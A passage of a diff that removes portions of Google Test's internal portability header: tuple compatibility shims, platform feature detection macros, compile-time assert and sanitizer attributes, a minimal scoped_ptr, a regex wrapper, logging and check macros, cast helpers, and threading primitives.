-#undef GTEST_4_TYPENAMES_
-#undef GTEST_5_TYPENAMES_
-#undef GTEST_6_TYPENAMES_
-#undef GTEST_7_TYPENAMES_
-#undef GTEST_8_TYPENAMES_
-#undef GTEST_9_TYPENAMES_
-#undef GTEST_10_TYPENAMES_
-
-#undef GTEST_DECLARE_TUPLE_AS_FRIEND_
-#undef GTEST_BY_REF_
-#undef GTEST_ADD_REF_
-#undef GTEST_TUPLE_ELEMENT_
-
-#endif  // GTEST_INCLUDE_GTEST_INTERNAL_GTEST_TUPLE_H_
-# elif GTEST_ENV_HAS_STD_TUPLE_
-#  include <tuple>
-// C++11 puts its tuple into the ::std namespace rather than
-// ::std::tr1.  gtest expects tuple to live in ::std::tr1, so put it there.
-// This causes undefined behavior, but supported compilers react in
-// the way we intend.
-namespace std {
-namespace tr1 {
-using ::std::get;
-using ::std::make_tuple;
-using ::std::tuple;
-using ::std::tuple_element;
-using ::std::tuple_size;
-}
-}
-
-# elif GTEST_OS_SYMBIAN
-
-// On Symbian, BOOST_HAS_TR1_TUPLE causes Boost's TR1 tuple library to
-// use STLport's tuple implementation, which unfortunately doesn't
-// work as the copy of STLport distributed with Symbian is incomplete.
-// By making sure BOOST_HAS_TR1_TUPLE is undefined, we force Boost to
-// use its own tuple implementation.
-#  ifdef BOOST_HAS_TR1_TUPLE
-#   undef BOOST_HAS_TR1_TUPLE
-#  endif  // BOOST_HAS_TR1_TUPLE
-
-// This prevents <boost/tr1/detail/config.hpp>, which defines
-// BOOST_HAS_TR1_TUPLE, from being #included by Boost's <tuple>.
-#  define BOOST_TR1_DETAIL_CONFIG_HPP_INCLUDED
-#  include <tuple>  // IWYU pragma: export  // NOLINT
-
-# elif defined(__GNUC__) && (GTEST_GCC_VER_ >= 40000)
-// GCC 4.0+ implements tr1/tuple in the <tr1/tuple> header.  This does
-// not conform to the TR1 spec, which requires the header to be <tuple>.
-
-#  if !GTEST_HAS_RTTI && GTEST_GCC_VER_ < 40302
-// Until version 4.3.2, gcc has a bug that causes <tr1/functional>,
-// which is #included by <tr1/tuple>, to not compile when RTTI is
-// disabled.  _TR1_FUNCTIONAL is the header guard for
-// <tr1/functional>.  Hence the following #define is a hack to prevent
-// <tr1/functional> from being included.
-#   define _TR1_FUNCTIONAL 1
-#   include <tr1/tuple>
-#   undef _TR1_FUNCTIONAL  // Allows the user to #include
-                        // <tr1/functional> if he chooses to.
-#  else
-#   include <tr1/tuple>  // NOLINT
-#  endif  // !GTEST_HAS_RTTI && GTEST_GCC_VER_ < 40302
-
-# else
-// If the compiler is not GCC 4.0+, we assume the user is using a
-// spec-conforming TR1 implementation.
-#  include <tuple>  // IWYU pragma: export  // NOLINT
-# endif  // GTEST_USE_OWN_TR1_TUPLE
-
-#endif  // GTEST_HAS_TR1_TUPLE
-
-// Determines whether clone(2) is supported.
-// Usually it will only be available on Linux, excluding
-// Linux on the Itanium architecture.
-// Also see http://linux.die.net/man/2/clone.
-#ifndef GTEST_HAS_CLONE
-// The user didn't tell us, so we need to figure it out.
-
-# if GTEST_OS_LINUX && !defined(__ia64__)
-#  if GTEST_OS_LINUX_ANDROID
-// On Android, clone() is only available on ARM starting with Gingerbread.
-#    if defined(__arm__) && __ANDROID_API__ >= 9
-#     define GTEST_HAS_CLONE 1
-#    else
-#     define GTEST_HAS_CLONE 0
-#    endif
-#  else
-#   define GTEST_HAS_CLONE 1
-#  endif
-# else
-#  define GTEST_HAS_CLONE 0
-# endif  // GTEST_OS_LINUX && !defined(__ia64__)
-
-#endif  // GTEST_HAS_CLONE
-
-// Determines whether to support stream redirection. This is used to test
-// output correctness and to implement death tests.
-#ifndef GTEST_HAS_STREAM_REDIRECTION
-// By default, we assume that stream redirection is supported on all
-// platforms except known mobile ones.
-# if GTEST_OS_WINDOWS_MOBILE || GTEST_OS_SYMBIAN || \
-    GTEST_OS_WINDOWS_PHONE || GTEST_OS_WINDOWS_RT
-#  define GTEST_HAS_STREAM_REDIRECTION 0
-# else
-#  define GTEST_HAS_STREAM_REDIRECTION 1
-# endif  // !GTEST_OS_WINDOWS_MOBILE && !GTEST_OS_SYMBIAN
-#endif  // GTEST_HAS_STREAM_REDIRECTION
-
-// Determines whether to support death tests.
-// Google Test does not support death tests for VC 7.1 and earlier as
-// abort() in a VC 7.1 application compiled as GUI in debug config
-// pops up a dialog window that cannot be suppressed programmatically.
-#if (GTEST_OS_LINUX || GTEST_OS_CYGWIN || GTEST_OS_SOLARIS || \
-     (GTEST_OS_MAC && !GTEST_OS_IOS) || \
-     (GTEST_OS_WINDOWS_DESKTOP && _MSC_VER >= 1400) || \
-     GTEST_OS_WINDOWS_MINGW || GTEST_OS_AIX || GTEST_OS_HPUX || \
-     GTEST_OS_OPENBSD || GTEST_OS_QNX || GTEST_OS_FREEBSD)
-# define GTEST_HAS_DEATH_TEST 1
-# include <vector>  // NOLINT
-#endif
-
-// We don't support MSVC 7.1 with exceptions disabled now.  Therefore
-// all the compilers we care about are adequate for supporting
-// value-parameterized tests.
-#define GTEST_HAS_PARAM_TEST 1
-
-// Determines whether to support type-driven tests.
-
-// Typed tests need <typeinfo> and variadic macros, which GCC, VC++ 8.0,
-// Sun Pro CC, IBM Visual Age, and HP aCC support.
-#if defined(__GNUC__) || (_MSC_VER >= 1400) || defined(__SUNPRO_CC) || \
-    defined(__IBMCPP__) || defined(__HP_aCC)
-# define GTEST_HAS_TYPED_TEST 1
-# define GTEST_HAS_TYPED_TEST_P 1
-#endif
-
-// Determines whether to support Combine(). This only makes sense when
-// value-parameterized tests are enabled.  The implementation doesn't
-// work on Sun Studio since it doesn't understand templated conversion
-// operators.
-#if GTEST_HAS_PARAM_TEST && GTEST_HAS_TR1_TUPLE && !defined(__SUNPRO_CC)
-# define GTEST_HAS_COMBINE 1
-#endif
-
-// Determines whether the system compiler uses UTF-16 for encoding wide strings.
-#define GTEST_WIDE_STRING_USES_UTF16_ \
-    (GTEST_OS_WINDOWS || GTEST_OS_CYGWIN || GTEST_OS_SYMBIAN || GTEST_OS_AIX)
-
-// Determines whether test results can be streamed to a socket.
-#if GTEST_OS_LINUX
-# define GTEST_CAN_STREAM_RESULTS_ 1
-#endif
-
-// Defines some utility macros.
-
-// The GNU compiler emits a warning if nested "if" statements are followed by
-// an "else" statement and braces are not used to explicitly disambiguate the
-// "else" binding.  This leads to problems with code like:
-//
-//   if (gate)
-//     ASSERT_*(condition) << "Some message";
-//
-// The "switch (0) case 0:" idiom is used to suppress this.
-#ifdef __INTEL_COMPILER
-# define GTEST_AMBIGUOUS_ELSE_BLOCKER_
-#else
-# define GTEST_AMBIGUOUS_ELSE_BLOCKER_ switch (0) case 0: default:  // NOLINT
-#endif
-
-// Use this annotation at the end of a struct/class definition to
-// prevent the compiler from optimizing away instances that are never
-// used.  This is useful when all interesting logic happens inside the
-// c'tor and / or d'tor.  Example:
-//
-//   struct Foo {
-//     Foo() { ... }
-//   } GTEST_ATTRIBUTE_UNUSED_;
-//
-// Also use it after a variable or parameter declaration to tell the
-// compiler the variable/parameter does not have to be used.
-#if defined(__GNUC__) && !defined(COMPILER_ICC)
-# define GTEST_ATTRIBUTE_UNUSED_ __attribute__ ((unused))
-#elif defined(__clang__)
-# if __has_attribute(unused)
-#  define GTEST_ATTRIBUTE_UNUSED_ __attribute__ ((unused))
-# endif
-#endif
-#ifndef GTEST_ATTRIBUTE_UNUSED_
-# define GTEST_ATTRIBUTE_UNUSED_
-#endif
-
-// A macro to disallow operator=
-// This should be used in the private: declarations for a class.
-#define GTEST_DISALLOW_ASSIGN_(type)\
-  void operator=(type const &)
-
-// A macro to disallow copy constructor and operator=
-// This should be used in the private: declarations for a class.
-#define GTEST_DISALLOW_COPY_AND_ASSIGN_(type)\
-  type(type const &);\
-  GTEST_DISALLOW_ASSIGN_(type)
-
-// Tell the compiler to warn about unused return values for functions declared
-// with this macro.  The macro should be used on function declarations
-// following the argument list:
-//
-//   Sprocket* AllocateSprocket() GTEST_MUST_USE_RESULT_;
-#if defined(__GNUC__) && (GTEST_GCC_VER_ >= 30400) && !defined(COMPILER_ICC)
-# define GTEST_MUST_USE_RESULT_ __attribute__ ((warn_unused_result))
-#else
-# define GTEST_MUST_USE_RESULT_
-#endif  // __GNUC__ && (GTEST_GCC_VER_ >= 30400) && !COMPILER_ICC
-
-// MS C++ compiler emits warning when a conditional expression is compile time
-// constant. In some contexts this warning is false positive and needs to be
-// suppressed. Use the following two macros in such cases:
-//
-// GTEST_INTENTIONAL_CONST_COND_PUSH_()
-// while (true) {
-// GTEST_INTENTIONAL_CONST_COND_POP_()
-// }
-# define GTEST_INTENTIONAL_CONST_COND_PUSH_() \
-    GTEST_DISABLE_MSC_WARNINGS_PUSH_(4127)
-# define GTEST_INTENTIONAL_CONST_COND_POP_() \
-    GTEST_DISABLE_MSC_WARNINGS_POP_()
-
-// Determine whether the compiler supports Microsoft's Structured Exception
-// Handling.  This is supported by several Windows compilers but generally
-// does not exist on any other system.
-#ifndef GTEST_HAS_SEH
-// The user didn't tell us, so we need to figure it out.
-
-# if defined(_MSC_VER) || defined(__BORLANDC__)
-// These two compilers are known to support SEH.
-#  define GTEST_HAS_SEH 1
-# else
-// Assume no SEH.
-#  define GTEST_HAS_SEH 0
-# endif
-
-#define GTEST_IS_THREADSAFE \
-    (0 \
-     || (GTEST_OS_WINDOWS && !GTEST_OS_WINDOWS_PHONE && !GTEST_OS_WINDOWS_RT) \
-     || GTEST_HAS_PTHREAD)
-
-#endif  // GTEST_HAS_SEH
-
-#ifdef _MSC_VER
-
-# if GTEST_LINKED_AS_SHARED_LIBRARY
-#  define GTEST_API_ __declspec(dllimport)
-# elif GTEST_CREATE_SHARED_LIBRARY
-#  define GTEST_API_ __declspec(dllexport)
-# endif
-
-#endif  // _MSC_VER
-
-#ifndef GTEST_API_
-# define GTEST_API_
-#endif
-
-#ifdef __GNUC__
-// Ask the compiler to never inline a given function.
-# define GTEST_NO_INLINE_ __attribute__((noinline))
-#else
-# define GTEST_NO_INLINE_
-#endif
-
-// _LIBCPP_VERSION is defined by the libc++ library from the LLVM project.
-#if defined(__GLIBCXX__) || defined(_LIBCPP_VERSION)
-# define GTEST_HAS_CXXABI_H_ 1
-#else
-# define GTEST_HAS_CXXABI_H_ 0
-#endif
-
-// A function level attribute to disable checking for use of uninitialized
-// memory when built with MemorySanitizer.
-#if defined(__clang__)
-# if __has_feature(memory_sanitizer)
-#  define GTEST_ATTRIBUTE_NO_SANITIZE_MEMORY_ \
-       __attribute__((no_sanitize_memory))
-# else
-#  define GTEST_ATTRIBUTE_NO_SANITIZE_MEMORY_
-# endif  // __has_feature(memory_sanitizer)
-#else
-# define GTEST_ATTRIBUTE_NO_SANITIZE_MEMORY_
-#endif  // __clang__
-
-// A function level attribute to disable AddressSanitizer instrumentation.
-#if defined(__clang__)
-# if __has_feature(address_sanitizer)
-#  define GTEST_ATTRIBUTE_NO_SANITIZE_ADDRESS_ \
-       __attribute__((no_sanitize_address))
-# else
-#  define GTEST_ATTRIBUTE_NO_SANITIZE_ADDRESS_
-# endif  // __has_feature(address_sanitizer)
-#else
-# define GTEST_ATTRIBUTE_NO_SANITIZE_ADDRESS_
-#endif  // __clang__
-
-// A function level attribute to disable ThreadSanitizer instrumentation.
-#if defined(__clang__)
-# if __has_feature(thread_sanitizer)
-#  define GTEST_ATTRIBUTE_NO_SANITIZE_THREAD_ \
-       __attribute__((no_sanitize_thread))
-# else
-#  define GTEST_ATTRIBUTE_NO_SANITIZE_THREAD_
-# endif  // __has_feature(thread_sanitizer)
-#else
-# define GTEST_ATTRIBUTE_NO_SANITIZE_THREAD_
-#endif  // __clang__
-
-namespace testing {
-
-class Message;
-
-#if defined(GTEST_TUPLE_NAMESPACE_)
-// Import tuple and friends into the ::testing namespace.
-// It is part of our interface, having them in ::testing allows us to change
-// their types as needed.
-using GTEST_TUPLE_NAMESPACE_::get;
-using GTEST_TUPLE_NAMESPACE_::make_tuple;
-using GTEST_TUPLE_NAMESPACE_::tuple;
-using GTEST_TUPLE_NAMESPACE_::tuple_size;
-using GTEST_TUPLE_NAMESPACE_::tuple_element;
-#endif  // defined(GTEST_TUPLE_NAMESPACE_)
-
-namespace internal {
-
-// A secret type that Google Test users don't know about.  It has no
-// definition on purpose.  Therefore it's impossible to create a
-// Secret object, which is what we want.
-class Secret;
-
-// The GTEST_COMPILE_ASSERT_ macro can be used to verify that a compile time
-// expression is true. For example, you could use it to verify the
-// size of a static array:
-//
-//   GTEST_COMPILE_ASSERT_(GTEST_ARRAY_SIZE_(names) == NUM_NAMES,
-//                         names_incorrect_size);
-//
-// or to make sure a struct is smaller than a certain size:
-//
-//   GTEST_COMPILE_ASSERT_(sizeof(foo) < 128, foo_too_large);
-//
-// The second argument to the macro is the name of the variable. If
-// the expression is false, most compilers will issue a warning/error
-// containing the name of the variable.
-
-#if GTEST_LANG_CXX11
-# define GTEST_COMPILE_ASSERT_(expr, msg) static_assert(expr, #msg)
-#else  // !GTEST_LANG_CXX11
-template <bool>
-  struct CompileAssert {
-};
-
-# define GTEST_COMPILE_ASSERT_(expr, msg) \
-  typedef ::testing::internal::CompileAssert<(static_cast<bool>(expr))> \
-      msg[static_cast<bool>(expr) ? 1 : -1] GTEST_ATTRIBUTE_UNUSED_
-#endif  // !GTEST_LANG_CXX11
-
-// Implementation details of GTEST_COMPILE_ASSERT_:
-//
-// (In C++11, we simply use static_assert instead of the following)
-//
-// - GTEST_COMPILE_ASSERT_ works by defining an array type that has -1
-//   elements (and thus is invalid) when the expression is false.
-//
-// - The simpler definition
-//
-//    #define GTEST_COMPILE_ASSERT_(expr, msg) typedef char msg[(expr) ? 1 : -1]
-//
-//   does not work, as gcc supports variable-length arrays whose sizes
-//   are determined at run-time (this is gcc's extension and not part
-//   of the C++ standard).  As a result, gcc fails to reject the
-//   following code with the simple definition:
-//
-//     int foo;
-//     GTEST_COMPILE_ASSERT_(foo, msg); // not supposed to compile as foo is
-//                                      // not a compile-time constant.
-//
-// - By using the type CompileAssert<(bool(expr))>, we ensures that
-//   expr is a compile-time constant.  (Template arguments must be
-//   determined at compile-time.)
-//
-// - The outter parentheses in CompileAssert<(bool(expr))> are necessary
-//   to work around a bug in gcc 3.4.4 and 4.0.1.  If we had written
-//
-//     CompileAssert<bool(expr)>
-//
-//   instead, these compilers will refuse to compile
-//
-//     GTEST_COMPILE_ASSERT_(5 > 0, some_message);
-//
-//   (They seem to think the ">" in "5 > 0" marks the end of the
-//   template argument list.)
-//
-// - The array size is (bool(expr) ? 1 : -1), instead of simply
-//
-//     ((expr) ? 1 : -1).
-//
-//   This is to avoid running into a bug in MS VC 7.1, which
-//   causes ((0.0) ? 1 : -1) to incorrectly evaluate to 1.
-
-// StaticAssertTypeEqHelper is used by StaticAssertTypeEq defined in gtest.h.
-//
-// This template is declared, but intentionally undefined.
-template <typename T1, typename T2>
-struct StaticAssertTypeEqHelper;
-
-template <typename T>
-struct StaticAssertTypeEqHelper<T, T> {
-  enum { value = true };
-};
-
-// Evaluates to the number of elements in 'array'.
-#define GTEST_ARRAY_SIZE_(array) (sizeof(array) / sizeof(array[0]))
-
-#if GTEST_HAS_GLOBAL_STRING
-typedef ::string string;
-#else
-typedef ::std::string string;
-#endif  // GTEST_HAS_GLOBAL_STRING
-
-#if GTEST_HAS_GLOBAL_WSTRING
-typedef ::wstring wstring;
-#elif GTEST_HAS_STD_WSTRING
-typedef ::std::wstring wstring;
-#endif  // GTEST_HAS_GLOBAL_WSTRING
-
-// A helper for suppressing warnings on constant condition.  It just
-// returns 'condition'.
-GTEST_API_ bool IsTrue(bool condition);
-
-// Defines scoped_ptr.
-
-// This implementation of scoped_ptr is PARTIAL - it only contains
-// enough stuff to satisfy Google Test's need.
-template <typename T>
-class scoped_ptr {
- public:
-  typedef T element_type;
-
-  explicit scoped_ptr(T* p = NULL) : ptr_(p) {}
-  ~scoped_ptr() { reset(); }
-
-  T& operator*() const { return *ptr_; }
-  T* operator->() const { return ptr_; }
-  T* get() const { return ptr_; }
-
-  T* release() {
-    T* const ptr = ptr_;
-    ptr_ = NULL;
-    return ptr;
-  }
-
-  void reset(T* p = NULL) {
-    if (p != ptr_) {
-      if (IsTrue(sizeof(T) > 0)) {  // Makes sure T is a complete type.
-        delete ptr_;
-      }
-      ptr_ = p;
-    }
-  }
-
-  friend void swap(scoped_ptr& a, scoped_ptr& b) {
-    using std::swap;
-    swap(a.ptr_, b.ptr_);
-  }
-
- private:
-  T* ptr_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(scoped_ptr);
-};
-
-// Defines RE.
-
-// A simple C++ wrapper for <regex.h>.  It uses the POSIX Extended
-// Regular Expression syntax.
-class GTEST_API_ RE {
- public:
-  // A copy constructor is required by the Standard to initialize object
-  // references from r-values.
-  RE(const RE& other) { Init(other.pattern()); }
-
-  // Constructs an RE from a string.
-  RE(const ::std::string& regex) { Init(regex.c_str()); }  // NOLINT
-
-#if GTEST_HAS_GLOBAL_STRING
-
-  RE(const ::string& regex) { Init(regex.c_str()); }  // NOLINT
-
-#endif  // GTEST_HAS_GLOBAL_STRING
-
-  RE(const char* regex) { Init(regex); }  // NOLINT
-  ~RE();
-
-  // Returns the string representation of the regex.
-  const char* pattern() const { return pattern_; }
-
-  // FullMatch(str, re) returns true iff regular expression re matches
-  // the entire str.
-  // PartialMatch(str, re) returns true iff regular expression re
-  // matches a substring of str (including str itself).
-  //
-  // TODO(wan@google.com): make FullMatch() and PartialMatch() work
-  // when str contains NUL characters.
-  static bool FullMatch(const ::std::string& str, const RE& re) {
-    return FullMatch(str.c_str(), re);
-  }
-  static bool PartialMatch(const ::std::string& str, const RE& re) {
-    return PartialMatch(str.c_str(), re);
-  }
-
-#if GTEST_HAS_GLOBAL_STRING
-
-  static bool FullMatch(const ::string& str, const RE& re) {
-    return FullMatch(str.c_str(), re);
-  }
-  static bool PartialMatch(const ::string& str, const RE& re) {
-    return PartialMatch(str.c_str(), re);
-  }
-
-#endif  // GTEST_HAS_GLOBAL_STRING
-
-  static bool FullMatch(const char* str, const RE& re);
-  static bool PartialMatch(const char* str, const RE& re);
-
- private:
-  void Init(const char* regex);
-
-  // We use a const char* instead of an std::string, as Google Test used to be
-  // used where std::string is not available.  TODO(wan@google.com): change to
-  // std::string.
-  const char* pattern_;
-  bool is_valid_;
-
-#if GTEST_USES_POSIX_RE
-
-  regex_t full_regex_;     // For FullMatch().
-  regex_t partial_regex_;  // For PartialMatch().
-
-#else  // GTEST_USES_SIMPLE_RE
-
-  const char* full_pattern_;  // For FullMatch();
-
-#endif
-
-  GTEST_DISALLOW_ASSIGN_(RE);
-};
-
-// Formats a source file path and a line number as they would appear
-// in an error message from the compiler used to compile this code.
-GTEST_API_ ::std::string FormatFileLocation(const char* file, int line);
-
-// Formats a file location for compiler-independent XML output.
-// Although this function is not platform dependent, we put it next to
-// FormatFileLocation in order to contrast the two functions.
-GTEST_API_ ::std::string FormatCompilerIndependentFileLocation(const char* file,
-                                                               int line);
-
-// Defines logging utilities:
-//   GTEST_LOG_(severity) - logs messages at the specified severity level. The
-//                          message itself is streamed into the macro.
-//   LogToStderr()  - directs all log messages to stderr.
-//   FlushInfoLog() - flushes informational log messages.
-
-enum GTestLogSeverity {
-  GTEST_INFO,
-  GTEST_WARNING,
-  GTEST_ERROR,
-  GTEST_FATAL
-};
-
-// Formats log entry severity, provides a stream object for streaming the
-// log message, and terminates the message with a newline when going out of
-// scope.
-class GTEST_API_ GTestLog {
- public:
-  GTestLog(GTestLogSeverity severity, const char* file, int line);
-
-  // Flushes the buffers and, if severity is GTEST_FATAL, aborts the program.
-  ~GTestLog();
-
-  ::std::ostream& GetStream() { return ::std::cerr; }
-
- private:
-  const GTestLogSeverity severity_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(GTestLog);
-};
-
-#define GTEST_LOG_(severity) \
-    ::testing::internal::GTestLog(::testing::internal::GTEST_##severity, \
-                                  __FILE__, __LINE__).GetStream()
-
-inline void LogToStderr() {}
-inline void FlushInfoLog() { fflush(NULL); }
-
-// INTERNAL IMPLEMENTATION - DO NOT USE.
-//
-// GTEST_CHECK_ is an all-mode assert. It aborts the program if the condition
-// is not satisfied.
-//  Synopsys:
-//    GTEST_CHECK_(boolean_condition);
-//     or
-//    GTEST_CHECK_(boolean_condition) << "Additional message";
-//
-//    This checks the condition and if the condition is not satisfied
-//    it prints message about the condition violation, including the
-//    condition itself, plus additional message streamed into it, if any,
-//    and then it aborts the program. It aborts the program irrespective of
-//    whether it is built in the debug mode or not.
-#define GTEST_CHECK_(condition) \
-    GTEST_AMBIGUOUS_ELSE_BLOCKER_ \
-    if (::testing::internal::IsTrue(condition)) \
-      ; \
-    else \
-      GTEST_LOG_(FATAL) << "Condition " #condition " failed. "
-
-// An all-mode assert to verify that the given POSIX-style function
-// call returns 0 (indicating success).  Known limitation: this
-// doesn't expand to a balanced 'if' statement, so enclose the macro
-// in {} if you need to use it as the only statement in an 'if'
-// branch.
-#define GTEST_CHECK_POSIX_SUCCESS_(posix_call) \
-  if (const int gtest_error = (posix_call)) \
-    GTEST_LOG_(FATAL) << #posix_call << "failed with error " \
-                      << gtest_error
-
-#if GTEST_HAS_STD_MOVE_
-using std::move;
-#else  // GTEST_HAS_STD_MOVE_
-template <typename T>
-const T& move(const T& t) {
-  return t;
-}
-#endif  // GTEST_HAS_STD_MOVE_
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-//
-// Use ImplicitCast_ as a safe version of static_cast for upcasting in
-// the type hierarchy (e.g. casting a Foo* to a SuperclassOfFoo* or a
-// const Foo*).  When you use ImplicitCast_, the compiler checks that
-// the cast is safe.  Such explicit ImplicitCast_s are necessary in
-// surprisingly many situations where C++ demands an exact type match
-// instead of an argument type convertable to a target type.
-//
-// The syntax for using ImplicitCast_ is the same as for static_cast:
-//
-//   ImplicitCast_<ToType>(expr)
-//
-// ImplicitCast_ would have been part of the C++ standard library,
-// but the proposal was submitted too late.  It will probably make
-// its way into the language in the future.
-//
-// This relatively ugly name is intentional. It prevents clashes with
-// similar functions users may have (e.g., implicit_cast). The internal
-// namespace alone is not enough because the function can be found by ADL.
-template<typename To>
-inline To ImplicitCast_(To x) { return ::testing::internal::move(x); }
-
-// When you upcast (that is, cast a pointer from type Foo to type
-// SuperclassOfFoo), it's fine to use ImplicitCast_<>, since upcasts
-// always succeed.  When you downcast (that is, cast a pointer from
-// type Foo to type SubclassOfFoo), static_cast<> isn't safe, because
-// how do you know the pointer is really of type SubclassOfFoo?  It
-// could be a bare Foo, or of type DifferentSubclassOfFoo.  Thus,
-// when you downcast, you should use this macro.  In debug mode, we
-// use dynamic_cast<> to double-check the downcast is legal (we die
-// if it's not).  In normal mode, we do the efficient static_cast<>
-// instead.  Thus, it's important to test in debug mode to make sure
-// the cast is legal!
-//    This is the only place in the code we should use dynamic_cast<>.
-// In particular, you SHOULDN'T be using dynamic_cast<> in order to
-// do RTTI (eg code like this:
-//    if (dynamic_cast<Subclass1>(foo)) HandleASubclass1Object(foo);
-//    if (dynamic_cast<Subclass2>(foo)) HandleASubclass2Object(foo);
-// You should design the code some other way not to need this.
-//
-// This relatively ugly name is intentional. It prevents clashes with
-// similar functions users may have (e.g., down_cast). The internal
-// namespace alone is not enough because the function can be found by ADL.
-template<typename To, typename From>  // use like this: DownCast_<T*>(foo);
-inline To DownCast_(From* f) {  // so we only accept pointers
-  // Ensures that To is a sub-type of From *.  This test is here only
-  // for compile-time type checking, and has no overhead in an
-  // optimized build at run-time, as it will be optimized away
-  // completely.
-  GTEST_INTENTIONAL_CONST_COND_PUSH_()
-  if (false) {
-  GTEST_INTENTIONAL_CONST_COND_POP_()
-    const To to = NULL;
-    ::testing::internal::ImplicitCast_<From*>(to);
-  }
-
-#if GTEST_HAS_RTTI
-  // RTTI: debug mode only!
-  GTEST_CHECK_(f == NULL || dynamic_cast<To>(f) != NULL);
-#endif
-  return static_cast<To>(f);
-}
-
-// Downcasts the pointer of type Base to Derived.
-// Derived must be a subclass of Base. The parameter MUST
-// point to a class of type Derived, not any subclass of it.
-// When RTTI is available, the function performs a runtime
-// check to enforce this.
-template <class Derived, class Base>
-Derived* CheckedDowncastToActualType(Base* base) {
-#if GTEST_HAS_RTTI
-  GTEST_CHECK_(typeid(*base) == typeid(Derived));
-  return dynamic_cast<Derived*>(base);  // NOLINT
-#else
-  return static_cast<Derived*>(base);  // Poor man's downcast.
-#endif
-}
-
-#if GTEST_HAS_STREAM_REDIRECTION
-
-// Defines the stderr capturer:
-//   CaptureStdout     - starts capturing stdout.
-//   GetCapturedStdout - stops capturing stdout and returns the captured string.
-//   CaptureStderr     - starts capturing stderr.
-//   GetCapturedStderr - stops capturing stderr and returns the captured string.
-//
-GTEST_API_ void CaptureStdout();
-GTEST_API_ std::string GetCapturedStdout();
-GTEST_API_ void CaptureStderr();
-GTEST_API_ std::string GetCapturedStderr();
-
-#endif  // GTEST_HAS_STREAM_REDIRECTION
-
-
-#if GTEST_HAS_DEATH_TEST
-
-const ::std::vector<testing::internal::string>& GetInjectableArgvs();
-void SetInjectableArgvs(const ::std::vector<testing::internal::string>*
-                             new_argvs);
-
-// A copy of all command line arguments.  Set by InitGoogleTest().
-extern ::std::vector<testing::internal::string> g_argvs;
-
-#endif  // GTEST_HAS_DEATH_TEST
-
-// Defines synchronization primitives.
-#if GTEST_IS_THREADSAFE
-# if GTEST_HAS_PTHREAD
-// Sleeps for (roughly) n milliseconds.  This function is only for testing
-// Google Test's own constructs.  Don't use it in user tests, either
-// directly or indirectly.
-inline void SleepMilliseconds(int n) {
-  const timespec time = {
-    0,                  // 0 seconds.
-    n * 1000L * 1000L,  // And n ms.
-  };
-  nanosleep(&time, NULL);
-}
-# endif  // GTEST_HAS_PTHREAD
-
-# if 0  // OS detection
-# elif GTEST_HAS_PTHREAD
-// Allows a controller thread to pause execution of newly created
-// threads until notified.  Instances of this class must be created
-// and destroyed in the controller thread.
-//
-// This class is only for testing Google Test's own constructs. Do not
-// use it in user tests, either directly or indirectly.
-class Notification {
- public:
-  Notification() : notified_(false) {
-    GTEST_CHECK_POSIX_SUCCESS_(pthread_mutex_init(&mutex_, NULL));
-  }
-  ~Notification() {
-    pthread_mutex_destroy(&mutex_);
-  }
-
-  // Notifies all threads created with this notification to start. Must
-  // be called from the controller thread.
-  void Notify() {
-    pthread_mutex_lock(&mutex_);
-    notified_ = true;
-    pthread_mutex_unlock(&mutex_);
-  }
-
-  // Blocks until the controller thread notifies. Must be called from a test
-  // thread.
-  void WaitForNotification() {
-    for (;;) {
-      pthread_mutex_lock(&mutex_);
-      const bool notified = notified_;
-      pthread_mutex_unlock(&mutex_);
-      if (notified)
-        break;
-      SleepMilliseconds(10);
-    }
-  }
-
- private:
-  pthread_mutex_t mutex_;
-  bool notified_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(Notification);
-};
-
-# elif GTEST_OS_WINDOWS && !GTEST_OS_WINDOWS_PHONE && !GTEST_OS_WINDOWS_RT
-
-GTEST_API_ void SleepMilliseconds(int n);
-
-// Provides leak-safe Windows kernel handle ownership.
-// Used in death tests and in threading support.
-class GTEST_API_ AutoHandle {
- public:
-  // Assume that Win32 HANDLE type is equivalent to void*. Doing so allows us to
-  // avoid including <windows.h> in this header file. Including <windows.h> is
-  // undesirable because it defines a lot of symbols and macros that tend to
-  // conflict with client code. This assumption is verified by
-  // WindowsTypesTest.HANDLEIsVoidStar.
-  typedef void* Handle;
-  AutoHandle();
-  explicit AutoHandle(Handle handle);
-
-  ~AutoHandle();
-
-  Handle Get() const;
-  void Reset();
-  void Reset(Handle handle);
-
- private:
-  // Returns true iff the handle is a valid handle object that can be closed.
-  bool IsCloseable() const;
-
-  Handle handle_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(AutoHandle);
-};
-
-// Allows a controller thread to pause execution of newly created
-// threads until notified.  Instances of this class must be created
-// and destroyed in the controller thread.
-//
-// This class is only for testing Google Test's own constructs. Do not
-// use it in user tests, either directly or indirectly.
-class GTEST_API_ Notification {
- public:
-  Notification();
-  void Notify();
-  void WaitForNotification();
-
- private:
-  AutoHandle event_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(Notification);
-};
-# endif  // OS detection
-
-// On MinGW, we can have both GTEST_OS_WINDOWS and GTEST_HAS_PTHREAD
-// defined, but we don't want to use MinGW's pthreads implementation, which
-// has conformance problems with some versions of the POSIX standard.
-# if GTEST_HAS_PTHREAD && !GTEST_OS_WINDOWS_MINGW
-
-// As a C-function, ThreadFuncWithCLinkage cannot be templated itself.
-// Consequently, it cannot select a correct instantiation of ThreadWithParam
-// in order to call its Run(). Introducing ThreadWithParamBase as a
-// non-templated base class for ThreadWithParam allows us to bypass this
-// problem.
-class ThreadWithParamBase {
- public:
-  virtual ~ThreadWithParamBase() {}
-  virtual void Run() = 0;
-};
-
-// pthread_create() accepts a pointer to a function type with the C linkage.
-// According to the Standard (7.5/1), function types with different linkages
-// are different even if they are otherwise identical.  Some compilers (for
-// example, SunStudio) treat them as different types.  Since class methods
-// cannot be defined with C-linkage we need to define a free C-function to
-// pass into pthread_create().
-extern "C" inline void* ThreadFuncWithCLinkage(void* thread) {
-  static_cast<ThreadWithParamBase*>(thread)->Run();
-  return NULL;
-}
-
-// Helper class for testing Google Test's multi-threading constructs.
-// To use it, write:
-//
-//   void ThreadFunc(int param) { /* Do things with param */ }
-//   Notification thread_can_start;
-//   ...
-//   // The thread_can_start parameter is optional; you can supply NULL.
-//   ThreadWithParam<int> thread(&ThreadFunc, 5, &thread_can_start);
-//   thread_can_start.Notify();
-//
-// These classes are only for testing Google Test's own constructs. Do
-// not use them in user tests, either directly or indirectly.
